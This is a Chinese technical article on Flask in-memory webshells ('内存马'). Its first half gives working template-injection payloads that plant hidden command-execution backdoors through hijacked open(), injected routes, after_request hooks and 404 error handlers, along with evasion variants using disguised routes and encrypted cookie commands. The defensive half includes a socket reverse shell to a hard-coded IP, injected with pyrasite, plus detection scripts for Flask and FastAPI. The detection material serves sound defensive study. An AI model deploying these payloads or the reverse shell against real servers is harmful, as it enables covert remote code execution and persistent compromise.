浅谈Flask内存马中的攻与防
字数 386 2025-08-22 12:23:36

Flask内存马攻防技术详解

一、Flask内存马攻击技术

1. 函数劫持式内存马

通过劫持Python内置函数实现持久化后门,适用于各种Python后端框架:

{{lipsum.__globals__['__builtins__']['exec']("global original_open
original_open=globals()['__builtins__']['open']
def custom_open(*args,**kwargs):
        from flask import request
        if request.query_params.get("cmd"):return __import__('io').StringIO(__import__('os').popen(request.query_params.get("cmd")).read())
        else:return original_open(*args,**kwargs)

globals()['__builtins__']['open']=custom_open")}}

特点

  • 劫持open()函数实现命令执行
  • 不影响正常文件操作
  • 可通过cmd参数传递命令

2. 添加路由式内存马(Flask高版本)

# 第一步:添加URL规则
url_for.__globals__['__builtins__']['eval'](
    "app.url_map.add(
        app.url_rule_class('/shell', methods=['GET'], endpoint='shell')
    )",
    {
        'app':url_for.__globals__['current_app']
    }
)

# 第二步:添加视图函数
url_for.__globals__['__builtins__']['eval'](
    "app.view_functions.update(
        {
            'shell': lambda:__import__('os').popen(
                app.request_context.__globals__['request_ctx'].request.args.get('cmd', 'whoami')
            ).read()
        }
    )",
    {
        'app':url_for.__globals__['current_app']
    }
)

3. after_request式内存马

{{url_for.__globals__['__builtins__']['eval']("app.after_request_funcs.setdefault(None, []).append(lambda resp: CmdResp if request.args.get('cmd') and exec(\"global CmdResp;CmdResp=__import__(\'flask\').make_response(__import__(\'os\').popen(request.args.get(\'cmd\')).read())\")==None else resp)",{'request':url_for.__globals__['request'],'app':get_flashed_messages.__globals__['current_app']})}}

4. 错误触发式内存马

{{url_for.__globals__['__builtals__']['exec']("global exc_class;global code;exc_class,code=app._get_exc_class_and_code(404);app.error_handler_spec[None][code][exc_class] = lambda error:__import__('os').popen(request.args.get('qwq')).read()", {'request':url_for.__globals__['request'],'app':get_flashed_messages.__globals__['current_app']})}}

二、内存马隐匿技术

1. 伪装常见路由

url_for.__globals__['__builtins__']['eval'](
    "app.view_functions.update(
        {
            'api/user/log': lambda:__import__('os').popen(
                app.request_context.__globals__['request_ctx'].request.args.get('cmd', 'whoami')
            ).read()
        }
    )",
    {
        'app':url_for.__globals__['current_app']
    }
)

2. 加密参数传递

{{url_for.__globals__['__builtins__']['exec']("global exc_class;global code;exc_class,code=app._get_exc_class_and_code(404);app.error_handler_spec[None][code][exc_class] = lambda error: __import__('os').popen(__import__('base64').b64decode(request.cookies.get('userinfo')).decode('utf-8')).read()", {'request':url_for.__globals__['request'],'app':get_flashed_messages.__globals__['current_app']})}}

3. 高级加密方案

global exc_class
global code
from itsdangerous import URLSafeSerializer
from flask import request
import json
exc_class, code = app._get_exc_class_and_code(404)
secret_key=''.join(chr(ord(a) ^ ord(b)) for a, b in zip('M8):M2uY[2%<^4+',',M[U?SX4>_VT;XG'))
def execute_command(cmd,secret_key):
    serializer = URLSafeSerializer(secret_key)
    encrypted_userinfo=cmd
    if not encrypted_userinfo:
        return
    try:
        command = serializer.loads(encrypted_userinfo)
    except Exception as e:
        data = {
            'status': 'error',
            'message': 'Decryption failed',
            'result': ''
        }
    try:
        result=None
        eval(command)
    except Exception as e:
        data = {
            'status': 'error',
            'message': str(e),
            'result': ''
        }
    data = {
        'status': 'ok',
        'result': serializer.dumps(result)
    }
    return json.dumps(data)
app.error_handler_spec[None][code][exc_class] = lambda error: execute_command(request.cookies.get('userinfo'), secret_key)

三、防御与检测技术

1. 内存取证技术

使用pyrasite库注入Python反向shell:

#!/usr/bin/env python3
import socket
import sys
import os
import code

def reverse_python_shell(target_ip, target_port):
    try:
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sock.connect((target_ip, target_port))
        sock_file = sock.makefile("rw")
        sys.stdin = sock_file
        sys.stdout = sock_file
        sys.stderr = sock_file
        shell = code.InteractiveConsole(globals())
        shell.interact()
    except Exception as e:
        try:
            sock.sendall(f"Error: {str(e)}\n".encode())
        finally:
            sock.close()

if __name__ == "__main__":
    target_ip = "192.168.239.199"
    target_port = 4444
    reverse_python_shell(target_ip, target_port)

注入命令:

pyrasite (pgrep -f "python3") shell-rev-py.py --verbose

2. 内存马检测技术

检测errorhandler内存马

global exc_class;global code;exc_class,code=app._get_exc_class_and_code(404);
memshell=app.error_handler_spec[None][code][exc_class]
import dis
dis.dis(memshell)

检测before/after_request内存马

app.after_request_funcs
app.before_request_funcs

检测路由内存马

for rule in app.url_map.iter_rules():
    print(f"Endpoint: {rule.endpoint}, Methods: {rule.methods}, Rule: {rule.rule}")

使用inspect模块检测

import inspect
suspicious_function = app.view_functions["test"]
print("Function name:", suspicious_function.__name__)
print("Source file:", inspect.getfile(suspicious_function))
print("Source code:", inspect.getsource(suspicious_function))

3. 综合检测脚本

#!/usr/bin/env python3

import sys
import os
import base64
import dis
import inspect
from collections import defaultdict

OUTPUT_FILE = "/tmp/flask_memshell_analysis.txt"

def save_to_file(data):
    with open(OUTPUT_FILE, "a") as f:
        f.write(data + "\n")

def analyze_function(func, description):
    try:
        bytecode = func.__code__.co_code
        bytecode_b64 = base64.b64encode(bytecode).decode()
        disassembled = dis.Bytecode(func)
        disassembled_str = "\n".join([f"{instr.opname} {instr.argrepr}" for instr in disassembled])
        
        save_to_file(f"=== {description} ===")
        save_to_file(f"Function: {func.__name__}")
        save_to_file(f"File: {inspect.getfile(func)}")
        save_to_file(f"Base64 Bytecode: {bytecode_b64}")
        save_to_file(f"Disassembled Bytecode:\n{disassembled_str}\n")
    except Exception as e:
        save_to_file(f"Error analyzing function {func}: {str(e)}\n")

def check_dynamic_routes(app):
    save_to_file("=== Dynamic Routes ===")
    try:
        for rule in app.url_map.iter_rules():
            func = app.view_functions[rule.endpoint]
            save_to_file(f"Endpoint: {rule.endpoint}, Methods: {rule.methods}, Rule: {rule.rule}")
            analyze_function(func, f"Route Function ({rule.endpoint})")
    except Exception as e:
        save_to_file(f"Error checking routes: {str(e)}\n")

def check_before_request(app):
    save_to_file("=== Before Request ===")
    try:
        for func in app.before_request_funcs.get(None, []):
            analyze_function(func, "Before Request Function")
    except Exception as e:
        save_to_file(f"Error checking before_request: {str(e)}\n")

def check_after_request(app):
    save_to_file("=== After Request ===")
    try:
        for func in app.after_request_funcs.get(None, []):
            analyze_function(func, "After Request Function")
    except Exception as e:
        save_to_file(f"Error checking after_request: {str(e)}\n")

def check_error_handlers(app):
    save_to_file("=== Error Handlers ===")
    try:
        for code, handler_map in app.error_handler_spec[None].items():
            for exc_class, func in handler_map.items():
                analyze_function(func, f"Error Handler ({exc_class}, {code})")
    except Exception as e:
        save_to_file(f"Error checking error handlers: {str(e)}\n")

def main():
    save_to_file("=== Flask Memory Shell Analysis ===")
    save_to_file(f"Injected into process PID: {os.getpid()}\n")

    if 'app' not in globals():
        save_to_file("Error: No 'app' variable found in globals.\n")
        return

    app = globals()['app']
    save_to_file(f"Flask app detected: {repr(app)}\n")

    check_dynamic_routes(app)
    check_before_request(app)
    check_after_request(app)
    check_error_handlers(app)
    save_to_file("=== Analysis Complete ===\n")

if __name__ == "__main__":
    main()

4. FastAPI内存马检测

import sys
import inspect
from fastapi.routing import APIRoute
from starlette.middleware.base import BaseHTTPMiddleware

def detect_middleware_injection(app):
    print("=== Checking Middlewares ===")
    for index, middleware in enumerate(app.user_middleware):
        try:
            dispatch_func = middleware.options.get("dispatch", None)
            if dispatch_func:
                print(f"Middleware {index}: {middleware.cls.__name__}")
                print(f"Dispatch function: {dispatch_func}")
                if inspect.isfunction(dispatch_func):
                    source_file = inspect.getfile(dispatch_func)
                    if source_file == "<string>":
                        print(f"  [ALERT] Middleware {index} has dynamically defined dispatch function!")
                        print(f"  Function source: {inspect.getsource(dispatch_func)}")
                    else:
                        print(f"  Source file: {source_file}")
        except Exception as e:
            print(f"Error analyzing middleware {index}: {e}")

def detect_route_injection(app):
    print("=== Checking Routes ===")
    for route in app.routes:
        if isinstance(route, APIRoute):
            endpoint = route.endpoint
            try:
                source_file = inspect.getfile(endpoint)
                if source_file == "<string>":
                    print(f"  [ALERT] Route {route.path} has dynamically defined endpoint!")
                    print(f"  Endpoint source: {inspect.getsource(endpoint)}")
                else:
                    print(f"  Route {route.path} -> Endpoint: {endpoint.__name__}")
                    print(f"  Source file: {source_file}")
            except Exception as e:
                print(f"Error analyzing route {route.path}: {e}")

def main():
    if "app" not in sys.modules["__main__"].__dict__:
        print("Error: No FastAPI app instance found in the main module.")
        return

    app = sys.modules["__main__"].__dict__["app"]
    print(f"Detected FastAPI app: {app}")

    detect_middleware_injection(app)
    detect_route_injection(app)

if __name__ == "__main__":
    main()
Flask内存马攻防技术详解 一、Flask内存马攻击技术 1. 函数劫持式内存马 通过劫持Python内置函数实现持久化后门,适用于各种Python后端框架: 特点 : 劫持 open() 函数实现命令执行 不影响正常文件操作 可通过 cmd 参数传递命令 2. 添加路由式内存马(Flask高版本) 3. after_ request式内存马 4. 错误触发式内存马 二、内存马隐匿技术 1. 伪装常见路由 2. 加密参数传递 3. 高级加密方案 三、防御与检测技术 1. 内存取证技术 使用 pyrasite 库注入Python反向shell: 注入命令: 2. 内存马检测技术 检测errorhandler内存马 检测before/after_ request内存马 检测路由内存马 使用inspect模块检测 3. 综合检测脚本 4. FastAPI内存马检测